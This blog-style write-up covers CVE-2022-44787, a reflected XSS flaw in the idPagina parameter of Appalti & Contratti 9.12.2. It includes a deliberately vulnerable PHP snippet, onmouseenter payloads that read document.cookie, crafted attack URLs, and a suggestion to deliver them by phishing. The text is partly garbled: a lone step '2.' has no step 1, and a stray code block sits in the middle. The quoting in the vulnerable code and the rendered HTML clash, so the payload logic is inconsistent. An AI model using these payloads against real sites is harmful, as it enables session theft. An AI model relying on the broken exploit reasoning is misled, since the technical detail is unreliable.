CVE-2022-44787 - Reflected XSS in Appalti & Contratti 9.12.2 (idPagina) — Analysis and Exploit Details

---

Published: June 2024

If you work with e-procurement systems, especially Appalti & Contratti, you should immediately pay attention to CVE-2022-44787. This post openly covers the vulnerability, including step-by-step details, real code examples, and guidance on how attackers might exploit it. Let’s get right to the heart of what you need to know.

What is CVE-2022-44787?

CVE-2022-44787 is a vulnerability in *Appalti & Contratti* version 9.12.2. The issue is a dangerous type of Reflected Cross-Site Scripting (XSS), triggered by improper input handling—specifically, with the GET parameter called idPagina. Since the application reflects this parameter’s value back into the HTML page response without any sanitation or encoding, malicious scripts can be injected.

Why is this dangerous?

A reflected XSS opens the door for attackers to execute arbitrary JavaScript code in a victim's browser by tricking them into clicking (or even just hovering) over a crafted link. Stealing cookies, session tokens, or performing actions on behalf of users are all possible once the attack succeeds.

The vulnerable endpoint looks like this (simplified example)

GET http://example.com/app/main?idPagina=...

The server-side code is failing to safely render the idPagina parameter, so if you provide arbitrary HTML or JavaScript code inside the idPagina value, it will be reflected as-is in the server response. Even dangerous HTML attributes, like event handlers, are not filtered.

Here’s a rough, minimalistic PHP-style example to demonstrate

<?php
// Vulnerable: outputs unencoded GET parameter
echo "<div id='content' idPagina='" . $_GET['idPagina'] . "'>";
?>

If a user clicks or hovers over a specially crafted link, a malicious script will execute.

Proof-of-Concept (PoC) Payload

The exploit takes advantage of the fact that attributes like onmouseenter aren’t sanitized. Here’s a malicious payload:

<a idPagina="1' onmouseenter='alert(document.cookie)'">Hover me</a>

So, a malicious link would look like

http://example.com/app/main?idPagina=1'+onmouseenter='alert(document.cookie)'+

When a victim visits this crafted URL and moves their mouse pointer inside or over a particular part of the page (that reflects idPagina), alert(document.cookie) will execute.

`

http://example.com/app/main?idPagina=1'+onmouseenter='alert("Hacked!")'+

`

2. Victim clicks on the link (or the attacker uses social engineering or phishing to get them to open it).

Let’s see how the injected payload would render in the actual HTML returned by the server

<div id="content" idPagina="1' onmouseenter='alert(document.cookie)'">
    ... rest of your page content ...
</div>

Here, as soon as a user moves their mouse over the affected element, alert(document.cookie) pops up—demonstrating an active XSS exploit.

Real World Impact

If you’re running Appalti & Contratti 9.12.2 or similar builds, your users are at risk of data theft, session hijacking, redirection to malicious websites, and more.

If you’re a user

- Update to the latest version as soon as the vendor releases a fix (vendor’s site).

References

- NVD - CVE-2022-44787
- OWASP XSS Cheat Sheet
- Appalti & Contratti Official Site

Conclusion

CVE-2022-44787 in Appalti & Contratti 9.12.2 is a straightforward yet critical example of how user input, when not properly sanitized, can open the door for arbitrary JavaScript execution. Always validate and encode user inputs and stay proactive with security updates.

*Stay safe. Patch quickly.*

*This post is exclusive content, offered in plain American English for broad clarity and utility.*

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:02:00 UTC